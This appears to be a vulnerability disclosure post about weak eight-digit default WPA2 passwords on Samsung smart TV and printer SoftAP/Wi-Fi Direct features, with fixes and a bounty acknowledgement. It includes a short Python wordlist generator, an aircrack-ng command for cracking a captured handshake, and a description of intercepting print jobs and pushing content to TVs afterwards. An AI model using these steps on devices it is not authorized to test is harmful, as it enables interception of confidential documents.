Samsung SoftAP weak default password
Many devices created by Samsung has an special way to
interact called in some cases wifi-direct and in other cases softAP this
feature is only some kind of access point with an DHCP server integrated. For
example if some user want to print a document using this functionality just
must search the SSID of the printer then join his PC or cellphone to it and
send the document. With Smarttv occurs something similar but it will show an
image or will reproduce video or music.
The vulnerability
Let’s see how look like a password of Softap
functionality from a smarttv
Here you can see the same example in a printer
Always the security of the softap uses WPA2 but if you
capture a handshake using aircrack just sniffing in the air is 100% possible
crack the password in less than 14 hours using a modern desktop computer.
So you can send content to the printer and smart tv
without anything can stop it.
This code will generate an 800 MB dictionary
dictgen.py
---------------------------------------------------------------------------
count = 0
while (count < 100000000):
print str(count).zfill(8)
count = count + 1
---------------------------------------------------------------------------------
Just run this:
python dictgen.py >dictionary.txt
If you want to test it use
aircrack-ng with the previously generated dictionary
The syntax is the following:
aircrack-ng printer.pcap –w
dictionary.txt
Now you need to wait a little bit
more than a half day to get the password
When finish you will see something
like the following image
Now you have ip
connectivity with the tv or printer and the clients
You could
intercept all files in transit, in the case of printers could have important
information as contracts, confidential documents, etc.
Also you could
reproduce arbitrary content in some cases on the smarttv using some dnla/upnp
software.
Fix and workaround
Any of the
following options could be used.
Option 1- Make your password stronger: It's a good idea change the password using lowers, CAPS and numbers with 8 to 15 characters.
Option 2- Shutting down the service: If you don't use this functionality just disable it.
Option 3-
Download official patch: It depends of
your model.
Vulnerable models
SmartTVs
Printers
May be all Xpress series
Confirmed in
M288OFW
It could affect more models than listed here
-------------------------------------------------
Samsung give me a reward :)
https://samsungtvbounty.com/HallofFame.aspx
